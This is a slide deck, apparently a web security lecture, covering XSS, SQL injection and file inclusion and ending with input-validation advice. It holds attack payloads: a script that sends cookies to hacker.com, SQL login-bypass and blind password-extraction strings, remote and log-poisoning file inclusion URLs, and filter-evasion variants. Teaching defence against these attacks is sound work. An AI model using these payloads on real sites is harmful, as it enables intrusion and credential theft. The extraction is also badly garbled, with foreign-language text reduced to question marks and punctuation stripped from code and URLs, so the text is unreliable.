Why is Web Security Important

1

2
Why is Web Security Important?

• Huge number of available targets
• Heavy reliance on developers skills
• Relative simplicity of some techniques
• Simplicity of remaining anonymous
• Deep impact of possible security compromise

3
Potential Targets

• Web server operating system
• RedHat Linux, Microsoft Windows
• Web server software
• Apache 2.2, IIS 7.0
• Web platform and/or technology
• PHP, Java EE, Microsoft .NET
• Web application
• Web portal, E-Commerce application

4
Cross-Site Scripting

• What is Cross-Site Scripting (XSS)?
• OWASPs 1st web security threat
• Most widely used method for stealing credentials
• The best example of how a vulnerable website
  threatens its users

5
Cross-Site Scripting

• Vulnerabilitys origin Not-validated inputs that
  are
• Directly shown in the page (Reflected)
• Saved and shown indirectly (Stored)

6
Reflected XSS Attacks

• http//www.site.com/error.aspx?msgSession
  Expired

??????? ??? ???? ??? ?? ?? ?? ?????
???. Session Expired. ???? ?????? ?? ???? ????
????? ???? ????. ???? ?? ???? ???? ?????? ????
??? ???? ????? ?? ?? ????? ????? ????? ????.
7
Reflected XSS Attacks

• http//www.site.com/error.aspx?msgSession
  Expiredltscriptgt...lt/scriptgt
• This time, the script will be executed.

??????? ??? ???? ??? ?? ?? ?? ?????
???. Session Expired. ???? ?????? ?? ???? ????
????? ???? ????. ???? ?? ???? ???? ?????? ????
??? ???? ????? ?? ?? ????? ????? ????? ????.
8
Reflected XSS Attacks

9
Reflected XSS Delivery Example

• ????? ??????
• ?? ?????? ?????? ??? ????? ? ????????? ???????
  ?? ???????? ??????? ??????? ?? ?? ???? ?? ?? ????
  ?? ??????? ????? ?? ???????? ?????? ??????? ?????
  ?? ?????? ? ?? ??? ??? ???? ??????.
• ?? ????? ?? ????? ????? ?? ?? ?? ????? ???????
  ??? ???? ??? ?????? ???? ?? ????? ???? ??? ? ??
  ???? ???? ?? ?????? ??????? ???? ????
• http//www.mysite.com/error.aspx?msgsurveyisnot
  readyyet.ltscriptgt...lt/scriptgt
• http//www.mysite.com/e72726f72.aspx?msg3dsur
  vey...

10
Stored XSS Attacks
11
XSS Attacks Payloads

• The malicious script makes the hacker able to
• Hijack sessions and impersonate users
• Exploit browser vulnerabilities
• Virtually deface the website
• Log keystrokes
• Copy clipboard contents
• Just one input that lacks validation is enough

12
SQL Injection

• What is SQL Injection?
• OWASPs 2nd web security threat
• Most widely used method for penetrating websites,
  stealing sensitive data and performing
  defacements
• Very short description Injecting SQL queries in
  inputs to change applications internal queries

13
SQL A Quick Review

• SELECT Username,Password FROM accounts WHERE
  Usernameferdowsi AND Passwordkhorasan

14
SQL Injection Simple Example

• A vulnerable login page
• SELECT FROM accounts WHERE
• Usernameferdowsi AND Passwordkhorasan

15
SQL Injection Simple Example

• What if someone enters
• Username OR 11--
• Password abc
• SELECT FROM accounts WHERE Username OR
  11--
• AND Passwordabc
• Which equals to
• SELECT FROM accounts WHERE 11-- AND ...
• He successfully logs in without even knowing a
  username!

16
SQL Injection Advanced Example

• A vulnerable news page
• http//www.site.com/news.php?id231
• Returns news number 231, entitled new system
  installation
• http//www.site.com/news.php?id24453321
• Does not return anything or shows an error
  message, because there is no news text with
  number 24453321
• So if any error happens, applications stops
  executing and shows nothing.

17
SQL Injection Advanced Example

• A vulnerable news page
• http//www.site.com/news.php?id231 and 11--
• Returns news number 231, because the id
  equals to 231 on new system installation news
  AND 1 always equals to 1.
• http//www.site.com/news.php?id231 and 10--
• Does not return anything or shows an error
  message, because although news number 231 exists,
  but 1 is not equal to 0.

18
SQL Injection Advanced Example

• Pulling out administrators password from the
  database by exploiting the vulnerable page
• http//www.site.com/news.php?id231 and
  ascii(substring((SELECT Password from accounts
  where id1),1,1))100--
• If the news page returns the news number 231,
  then first character of administrators password
  has an ASCII code of 100. In other words,
  administrator password is d

19
SQL Injection Risks

• From exposing sensitive information which often
  leads to full system compromise.
• Database structure
• Usernames and Passwords
• Personal Information
• Companys secrets
• To system command execution on servers without
  proper configuration.

20
Malicious File Inclusion

• What is File Inclusion?
• OWASPs 3rd web security threat
• Very dangerous, as it allows attackers to execute
  their own malicious server-side code.

21
Malicious File Inclusion

• Remote file inclusion example A vulnerable
  modular system
• http//www.site.com/modules?modulearticlesid25
  
• System executes the modules residing in
  articles.php. If the system does not
• check the included module, hackers code residing
  in code.php can simply be
• executed in the server by injecting a remote
  file
• http//www.site.com/modules?
• modulehttp//www.hacker.com/codeid25

22
Malicious File Inclusion

• Application developer disables remote inclusion
  and includes scripts in modules/ directory.
• http//www.site.com/modules?modulearticlesid25
  
• Executes
• /home/webserver/public_html/site/modules/articles
  .php
• Bad news The hacker is still able to execute
  his own code. But how?

23
Malicious File Inclusion

• The web server writes a copy of each request in a
• standard log file, which looks like this
• 192.168.101.21 - - 08/Aug/2009231712 0430
• "GET /page1.html HTTP/1.1" 200 111
• 192.168.105.211 - - 08/Aug/2009231721 0430
• "GET /page2.html HTTP/1.1" 200 111
• 192.168.102.57 - - 29/Aug/2009190041 0430
• "GET /serve/22660/348386.jpg HTTP/1.1" 404 220
• 217.219.186.24 - - 07/Sep/2009133212 0430
• "GET /page1.html HTTP/1.1" 200 111
• Logging is essential and is not a security threat
  by its own.

24
Malicious File Inclusion

• Hacker injects his code in the log file by a
  single
• HTTP request
• 192.168.101.21 - - 08/Aug/2009231712 0430
• "GET /page1.html HTTP/1.1" 200 111
• 192.168.105.211 - - 08/Aug/2009231721 0430
• "GET /page2.html HTTP/1.1" 200 111
• 192.168.102.57 - - 29/Aug/2009190041 0430
• "GET /serve/22660/348386.jpg HTTP/1.1" 404 220
• 217.219.186.24 - - 07/Sep/2009133212 0430
• "GET /page1.html HTTP/1.1" 200 111
• 217.219.102.101 - - 08/Sep/2009171604 0430
• "lt?php evil_code ?gt" 400 220

25
Malicious File Inclusion

• Hacker is now able to execute his code which
  resides in
• web servers log file
• http//www.site.com/modules?module../../../../../
  
• usr/local/apache/logs/access.log00id25
• Executes
• /home/webserver/public_html/site/modules/../../../
  ..
• /../usr/local/apache/logs/access.log
• Which contains hackers code. (lt?php evil_code
  ?gt)

26
Importance of Input Validation

• Why were previous attacks successful?
• One reason Inputs were not validated.
• Inputs are not just form data or query string
  parameters.
• A single, not-validated input is enough for the
  hacker to perform his attack.
• Efficient input validation is not so easy as it
  seems to be.

27
Improtance of PROPER Input Validation

• How one hijacks sessions by XSS attacks?
• ltscriptgt
• var xnew Image()
• x.srchttp//www.hacker.com/grab?cdocument.coo
  kie
• lt/scriptgt
• We filter ltscriptgt in inputs.
• We filter document.cookie in inputs.
• We put a length limitation of 50 characters on
  msg input.
• Bad news All three methods fail.

28
Improtance of PROPER Input Validation

• How blacklisting ltscriptgt fails
• 1. ltsCRiPtgt...
• 2. ltscript gt...
• 3. agtltspan stylecolorexpression(alert(document
  .cookie))gt
• 4. agt00ltscriptgt...
• 5. 253cscript253e
• 8. ...

29
Improtance of PROPER Input Validation

• How blacklisting document.cookie fails
• var a alert(doc ument.coo kie)
  eval(a)
• var a alert( String.fromCharCode(100,111,99,
  117,109,
• 101,110,116,46,99,111,111,107,105,101) )
  eval(a)
• Both show cookies, but also pass the validation
  as they dont contain document.cookie

30
Improtance of PROPER Input Validation

• How length limitations fail
• Technique 1 Accessing the URI indirectly
• http//www.mysite.com/error.php?msg
• ltscriptgteval(location.substr(indexOf(a)))lt/scri
  ptgt
• altscriptgt...very long one...lt/scriptgt

31
Improtance of PROPER Input Validation

• How length limitations fail
• Technique 2 Using multiple inputs
• ltinput typehidden namepage_id
  valueagtltscriptgt/gt
• ...
• ltinput typehidden nameseed
  value/alert(document.cookie)/gt
• ...
• ltinput typehidden namemode
  value/lt/scriptgtgt

32
Improtance of PROPER Input Validation

• How to validate inputs properly?
• Inputs should be deeply analyzed.
• All inputs should be validated against
  white-lists powered with regular expressions.
• Special characters should be encoded properly.
• If a validation technique blocks XSS attacks, it
  may not block SQL Injection attacks.
• Input validation mechanisms should not put too
  much overhead on request processing.

33
Conclusion

• Security should be considered as a must from the
  beginning of the design and development process.
• Developers themselves should be trained in
  security strategies and common threats.
• Additional time and effort should be put on the
  applications security verification.
• But, even a highly-secure web application does
• not survive in an insecure web server.